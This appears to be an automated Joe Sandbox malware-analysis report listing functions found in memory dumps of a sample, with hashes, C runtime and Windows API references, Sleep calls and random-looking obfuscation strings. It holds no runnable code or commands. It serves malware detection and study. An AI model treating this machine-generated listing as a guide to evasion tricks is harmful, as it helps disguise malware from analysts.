Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
Instruction ID: 06c98abe4f2e15ac505575210af7a22cf09c5e54c84e3c4d592ee0c9c1001ce3
Opcode Fuzzy Hash: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
Instruction Fuzzy Hash: 4A3114745183419FD741EF29C480A4BFBE1FFC9358F01D91AF98897261D730E985CA62

Function 021C18D0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: ff6363c313ea6bb1721b6ca58e38109e6d833b2d4bfc124919f5d604beb55e7b
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 3511387F2C004263D60CCE2ED4B46F6E3A5EBE622873D427ED08A4B75AD322E141D500

Function 021AB000 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
Instruction ID: a1d059ce97b1cb63b8726715a6d92c526908ca14f348a1bef3bc242172ac98cd
Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
Instruction Fuzzy Hash: 68113D0A8492C4BDCF424A7840E56EBEFA58E3B218F4A71DA88C44B743D01B150FE7A1

Function 021A0042 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: eee07822293123d4280512ff442581628dffa3a86ba5aeb37bdeb7006b533b55
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 5B117C76380200AFEB54DE65DDA1FA673EAEB8C360B198165E908CB311D776E841CB60

Function 0210D0A3 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1752159390.000000000210D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0210D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_210d000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 3f4285d10a82d1daf196eb19e42d6be2859168ba31b4d85ab933d98181bae435
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: FA1170723801009FD754DE95ECC0FA673EAEB89220B198065ED08CB356DBB6EC42C760

Function 021AA79A Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
Instruction ID: 41c645bd9992ef7433c2951d303427adda9992aaa97f3722a43a36e88417ef3a
Opcode Fuzzy Hash: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
Instruction Fuzzy Hash: 840128768106629BD741DF3EC8C045AFBF1BF082217528B3ADCA083A41D334E662DBE4

Function 00401DF1 Relevance: 28.4, APIs: 12, Strings: 4, Instructions: 396COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00401DDC
__decode_pointer.LIBCMT ref: 00401F5F
__decode_pointer.LIBCMT ref: 00401F8E
__decode_pointer.LIBCMT ref: 00401FB3
__aulldvrm.LIBCMT ref: 0040211A
_write_multi_char.LIBCMT ref: 0040222E
_write_string.LIBCMT ref: 0040224E
_write_multi_char.LIBCMT ref: 00402270
__cftof.LIBCMT ref: 004022B0
_write_string.LIBCMT ref: 004022D3
_write_multi_char.LIBCMT ref: 0040231C

Strings

@, xrefs: 00401E7E
-, xrefs: 004021D9
g, xrefs: 00401F98
, xrefs: 00401E52

Memory Dump Source

Source File: 00000000.00000002.1751755141.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1751728020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751755141.0000000000416000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751850291.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751866891.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751889363.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: __decode_pointer_write_multi_char$_write_string$__aulldvrm__cftof_strlen
String ID: $-$@$g
API String ID: 629750176-2320099971
Opcode ID: 095b86110f62afe62ee8aeefad637a127057675e2d76af2da50f9e5d4e3389cc
Instruction ID: 6ba02f3cd637ff9e87c9cb4f736c74e885d756f073139124003349791a170c4c
Opcode Fuzzy Hash: 095b86110f62afe62ee8aeefad637a127057675e2d76af2da50f9e5d4e3389cc
Instruction Fuzzy Hash: DFF18B7190422D8ADF349A64CD8C7AAB7B4AB14318F1402EBD908B62E1C7BC5EC5CF49

Function 00401FF4 Relevance: 28.4, APIs: 12, Strings: 4, Instructions: 354COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00401DDC
__decode_pointer.LIBCMT ref: 00401F5F
__decode_pointer.LIBCMT ref: 00401F8E
__decode_pointer.LIBCMT ref: 00401FB3
__aulldvrm.LIBCMT ref: 0040211A
_write_multi_char.LIBCMT ref: 0040222E
_write_string.LIBCMT ref: 0040224E
_write_multi_char.LIBCMT ref: 00402270
__cftof.LIBCMT ref: 004022B0
_write_string.LIBCMT ref: 004022D3
_write_multi_char.LIBCMT ref: 0040231C

Strings

-, xrefs: 004021D9
g, xrefs: 00401F98
@, xrefs: 00401C3C
', xrefs: 00402005

Memory Dump Source

Source File: 00000000.00000002.1751755141.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1751728020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751755141.0000000000416000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751850291.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751866891.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751889363.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: __decode_pointer_write_multi_char$_write_string$__aulldvrm__cftof_strlen
String ID: '$-$@$g
API String ID: 629750176-1341051917
Opcode ID: a8d063c7bea4694a42b0598f3217cd777eb3dfee8eaea566d515b37e24a5fe7c
Instruction ID: 6e2cdd8e9a595e491f7ab82d7812ba42354a33e983998a8c0f01f17afa3f5d1a
Opcode Fuzzy Hash: a8d063c7bea4694a42b0598f3217cd777eb3dfee8eaea566d515b37e24a5fe7c
Instruction Fuzzy Hash: A5E17A7190422D9ADF358A64CD8C7EABBB5AB14314F1402EBD508B62E1CBB85FC5CF49

Function 00402191 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 288COMMON

Download Yara Rule

APIs

_write_multi_char.LIBCMT ref: 0040222E
_write_string.LIBCMT ref: 0040224E
_write_multi_char.LIBCMT ref: 00402270
__cftof.LIBCMT ref: 004022B0
_write_string.LIBCMT ref: 004022D3
_write_multi_char.LIBCMT ref: 0040231C

Strings

-, xrefs: 004021D9
g, xrefs: 00401F98
@, xrefs: 00401C3C

Memory Dump Source

Source File: 00000000.00000002.1751755141.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1751728020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751755141.0000000000416000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751850291.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751866891.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751889363.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: _write_multi_char$_write_string$__cftof
String ID: -$@$g
API String ID: 3900997005-2189933660
Opcode ID: 86cdf7e528832d705806c0ab37857f0f317a3912bb5b609c4eb3acbe7be5ac51
Instruction ID: 2d791c561945433e32149f911bfe946a9588dcc2bca4875a51dc65b82c03c0d9
Opcode Fuzzy Hash: 86cdf7e528832d705806c0ab37857f0f317a3912bb5b609c4eb3acbe7be5ac51
Instruction Fuzzy Hash: CBC1687180522D9ADF359A64CD8C7EABBB4AB14314F1001EBD808B62E1CBB85FC5CF49

Function 004021AA Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 285COMMON

Download Yara Rule

APIs

_write_multi_char.LIBCMT ref: 0040222E
_write_string.LIBCMT ref: 0040224E
_write_multi_char.LIBCMT ref: 00402270
__cftof.LIBCMT ref: 004022B0
_write_string.LIBCMT ref: 004022D3
_write_multi_char.LIBCMT ref: 0040231C

Strings

-, xrefs: 004021D9
g, xrefs: 00401F98
@, xrefs: 00401C3C

Memory Dump Source

Source File: 00000000.00000002.1751755141.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1751728020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751755141.0000000000416000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751850291.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751866891.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751889363.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: _write_multi_char$_write_string$__cftof
String ID: -$@$g
API String ID: 3900997005-2189933660
Opcode ID: 4d02b72d50c9f9bb1d59fce803be6ecd55bd1512cc6d0135707bc7223e04f134
Instruction ID: b98fa686e20cc06dfa8a849242217f3b7f688326131eda51fcf34a02959cebd9
Opcode Fuzzy Hash: 4d02b72d50c9f9bb1d59fce803be6ecd55bd1512cc6d0135707bc7223e04f134
Instruction Fuzzy Hash: 2FC1687180522D9ADF359A64CD8C7EABBB8AB14314F1401EBD408B62E1CBB95FC5CF49

Function 021C6437 Relevance: 18.1, APIs: 12, Instructions: 84COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 021C644E

Part of subcall function 021C9636: __calloc_impl.LIBCMT ref: 021C9645

__calloc_crt.LIBCMT ref: 021C6472
_free.LIBCMT ref: 021C6480
__calloc_crt.LIBCMT ref: 021C648E
_free.LIBCMT ref: 021C649E
_free.LIBCMT ref: 021C64A4
__copytlocinfo_nolock.LIBCMT ref: 021C64B3
__setmbcp_nolock.LIBCMT ref: 021C64D4
_free.LIBCMT ref: 021C64E2
___removelocaleref.LIBCMT ref: 021C64E9
___freetlocinfo.LIBCMT ref: 021C64F0
_free.LIBCMT ref: 021C64F6

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
String ID:
API String ID: 1442030790-0
Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction ID: 8d1f141b95bc054dbbe093bf193462b302c8ee3b406dc8b368876659d61a4e92
Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction Fuzzy Hash: B521D43D1C8280FEE7253F65CC01E1B7BDAEFA1B60B70802DE449550A1EB32D900CE90

Function 021C3F16 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 021C3F51

Part of subcall function 021C5BA8: __getptd_noexit.LIBCMT ref: 021C5BA8

__gmtime64_s.LIBCMT ref: 021C3FEA
__gmtime64_s.LIBCMT ref: 021C4020
__gmtime64_s.LIBCMT ref: 021C403D
__allrem.LIBCMT ref: 021C4093
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 021C40AF
__allrem.LIBCMT ref: 021C40C6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 021C40E4
__allrem.LIBCMT ref: 021C40FB
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 021C4119
__invoke_watson.LIBCMT ref: 021C418A

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction ID: 001e5844313cf80ed53bb6147815718e35edd563bee72510adaa4b7a95b62aab
Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction Fuzzy Hash: E3711C75A80716AFE7149F79CC51BAAB3B9AF24724F24417DE524E7380E770E9008BD1

Function 021C650E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE

Download Yara Rule

APIs

__invoke_watson.LIBCMT ref: 021C6547
__calloc_crt.LIBCMT ref: 021C6598
__lock.LIBCMT ref: 021C65AE
__copytlocinfo_nolock.LIBCMT ref: 021C65BF
_wcscmp.LIBCMT ref: 021C65F9
__lock.LIBCMT ref: 021C6610
__updatetlocinfoEx_nolock.LIBCMT ref: 021C6622
___removelocaleref.LIBCMT ref: 021C6628
__updatetlocinfoEx_nolock.LIBCMT ref: 021C6647

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
String ID:
API String ID: 3432600739-0
Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction ID: ddd898323d85cab535b5eaa61b560906797be9185dba77562d2e1443619cb024
Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction Fuzzy Hash: FB41563A988354AFDB00BFA4DC8079E3BFAAFA4314F30402DE91496190DB759545DF91

Function 021C84AB Relevance: 16.6, APIs: 11, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCorExitProcess.LIBCMT ref: 021C84B1
_free.LIBCMT ref: 021C84E2
_free.LIBCMT ref: 021C84F5
_free.LIBCMT ref: 021C8513
_free.LIBCMT ref: 021C8525
_free.LIBCMT ref: 021C8536
_free.LIBCMT ref: 021C8541
_free.LIBCMT ref: 021C8565
_free.LIBCMT ref: 021C8581
_free.LIBCMT ref: 021C8597
_free.LIBCMT ref: 021C85BF

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID: _free$ExitProcess___crt
String ID:
API String ID: 1022109855-0
Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction ID: d87b3529708f5cc6e0934bfc4f74d68fa0ddc468c9e0fec5b3539710e0a3af56
Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction Fuzzy Hash: 2331C2399C0250AFDB226F14FCC094977A6EB35325325862EE908572A0CBF059C9AE90

Function 021EFC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 021EFC1F

Part of subcall function 021D169C: std::exception::_Copy_str.LIBCMT ref: 021D16B5

__CxxThrowException@8.LIBCMT ref: 021EFC34
std::exception::exception.LIBCMT ref: 021EFC4D
__CxxThrowException@8.LIBCMT ref: 021EFC62
std::regex_error::regex_error.LIBCPMT ref: 021EFC74

Part of subcall function 021EF914: std::exception::exception.LIBCMT ref: 021EF92E

__CxxThrowException@8.LIBCMT ref: 021EFC82
std::exception::exception.LIBCMT ref: 021EFC9B
__CxxThrowException@8.LIBCMT ref: 021EFCB0

Strings

leM, xrefs: 021EFCA8

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
String ID: leM
API String ID: 3569886845-2926266777
Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction ID: ecc901a5cf7af2ae9517ef08da7b8e37ae3beac37922496972f37b55c1ad1c88
Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction Fuzzy Hash: 4011B679C4020DBBCF00FFA5E855CEEBBBDAA04344B408966AD1897641EB74A3498F94

Function 021AF010 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 021AF01F

Part of subcall function 021C1602: __FF_MSGBANNER.LIBCMT ref: 021C1619
Part of subcall function 021C1602: __NMSG_WRITE.LIBCMT ref: 021C1620

_malloc.LIBCMT ref: 021AF02B
_wprintf.LIBCMT ref: 021AF03E
_free.LIBCMT ref: 021AF044
_free.LIBCMT ref: 021AF065
_malloc.LIBCMT ref: 021AF06D
_sprintf.LIBCMT ref: 021AF0C0
_wprintf.LIBCMT ref: 021AF0D2
_wprintf.LIBCMT ref: 021AF0DC
_free.LIBCMT ref: 021AF0E5

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID: _free_malloc_wprintf$_sprintf
String ID:
API String ID: 3721157643-0
Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction ID: 43f47fac63127eaf1ab312436ebe807ea0dcbe256c8788535613b5433223a9ad
Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction Fuzzy Hash: AA1124BA9C05607ED261B6B44C12EFF3BED9F56302F1400ADFE8CD1180DB595A059BB1

Function 021B1960 Relevance: 13.6, APIs: 9, Instructions: 149COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 021B19C6
__CxxThrowException@8.LIBCMT ref: 021B19F1
__CxxThrowException@8.LIBCMT ref: 021B1A1A
__CxxThrowException@8.LIBCMT ref: 021B1A4B
_memset.LIBCMT ref: 021B1A6A
__CxxThrowException@8.LIBCMT ref: 021B1A90
_malloc.LIBCMT ref: 021B1AA0
_memset.LIBCMT ref: 021B1AAB
_sprintf.LIBCMT ref: 021B1ACE

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset$_malloc_sprintf
String ID:
API String ID: 65388428-0
Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction ID: b73e19df6587522f8b8dbd0737bdf75283ac7e03208421dd38a9db45d5b4a1b3
Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction Fuzzy Hash: 87513A71D80219BBDB11DBA5DC86FEEBBB9FF05744F100025F909B6180E7746A058BA5

Function 004A76C9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64sleepCOMMON

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 004A76F9
GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 004A7737
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004A773D
OpenJobObjectW.KERNEL32(00000000,00000000,00000000), ref: 004A7746
GetShortPathNameA.KERNEL32(00000000,?,00000000), ref: 004A7755
Sleep.KERNEL32(00000000), ref: 004A775C

Strings

-, xrefs: 004A7771

Memory Dump Source

Source File: 00000000.00000002.1751755141.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1751728020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751755141.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751850291.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751866891.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751889363.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: HighestNodeNumaNumber$CalendarInfoNameObjectOpenPathShortSleep
String ID: -
API String ID: 2970987874-2547889144
Opcode ID: 9b33d46c0403a50369798fe00ff57a8df1f0e7e6d27645e2e6df78d4bee4b6d8
Instruction ID: eab8635ab0fcaf2fc8953894b32ace80609d3d51a4a9cbe2f64154a44f6f28a4
Opcode Fuzzy Hash: 9b33d46c0403a50369798fe00ff57a8df1f0e7e6d27645e2e6df78d4bee4b6d8
Instruction Fuzzy Hash: DF2196B5804158EBCB219F25DC849AF7BB8EF86714F0181ADE619A7141CB385DC6CF6C

Function 021AF210 Relevance: 10.7, APIs: 7, Instructions: 165COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 021AF284
__CxxThrowException@8.LIBCMT ref: 021AF2AF
__CxxThrowException@8.LIBCMT ref: 021AF2DE
__CxxThrowException@8.LIBCMT ref: 021AF30F
_memset.LIBCMT ref: 021AF32E
__CxxThrowException@8.LIBCMT ref: 021AF354
_sprintf.LIBCMT ref: 021AF373

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction ID: 81fc8416af42e832bbc75bde3d58b2adb54ae4e3be2d82b7dc9c73d99179ba3c
Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction Fuzzy Hash: 5B513BB5980209AEDF11DFA1DC56FEFBBB9AF04704F20402AF905B6180D775AA05CBA5

Function 021AF440 Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 021AF4B7
__CxxThrowException@8.LIBCMT ref: 021AF4E2
__CxxThrowException@8.LIBCMT ref: 021AF504
__CxxThrowException@8.LIBCMT ref: 021AF535
_memset.LIBCMT ref: 021AF554
__CxxThrowException@8.LIBCMT ref: 021AF57A
_sprintf.LIBCMT ref: 021AF594

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction ID: 4d002f7a9d6bfe9787177a27f80f75ffa2c25378f4f6de45b57109ccd3a2d67a
Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction Fuzzy Hash: 58514175D80209AEDF21DFA1DC55FEEBBB9EF04704F200129F905B6180E775AA068BA4

Function 004A7796 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetFullPathNameA.KERNEL32(vobarigawekowoxilinifur,00000000,?,00000000), ref: 004A77D0
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004A77EA
HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 004A7808
SetFileShortNameA.KERNEL32(00000000,ximawazudikahefafopoporifozib kadamuzayecep hizujajugejusawaharidam wunoguzazapeguvecazageganuzi), ref: 004A7814

Strings

vobarigawekowoxilinifur, xrefs: 004A77CB
ximawazudikahefafopoporifozib kadamuzayecep hizujajugejusawaharidam wunoguzazapeguvecazageganuzi, xrefs: 004A780E

Memory Dump Source

Source File: 00000000.00000002.1751755141.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1751728020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751755141.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751850291.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751866891.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751889363.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Name$CreateEnvironmentFileFreeFullHeapPathShortStrings
String ID: vobarigawekowoxilinifur$ximawazudikahefafopoporifozib kadamuzayecep hizujajugejusawaharidam wunoguzazapeguvecazageganuzi
API String ID: 4071102102-3876065148
Opcode ID: 8760816cc998bdfbdd5e39e83e3124332d60a725e50a4bdf52e1ef8e9766b2bc
Instruction ID: e7bf0dbb7ed17877254e05ca546f2dd8197638464256ca5c76e718710d91db8c
Opcode Fuzzy Hash: 8760816cc998bdfbdd5e39e83e3124332d60a725e50a4bdf52e1ef8e9766b2bc
Instruction Fuzzy Hash: 8D015E75508104ABD720AB79ED85D6F3BBCE7AB715B00013EF601D2152DA785845CA6D

Function 021E208B Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

__getenv_helper_nolock.LIBCMT ref: 021E20C6
__invoke_watson.LIBCMT ref: 021E2120
_strlen.LIBCMT ref: 021E20D4

Part of subcall function 021C5BA8: __getptd_noexit.LIBCMT ref: 021C5BA8

_strnlen.LIBCMT ref: 021E215F
__lock.LIBCMT ref: 021E2170
__getenv_helper_nolock.LIBCMT ref: 021E217B

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
String ID:
API String ID: 3534693527-0
Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
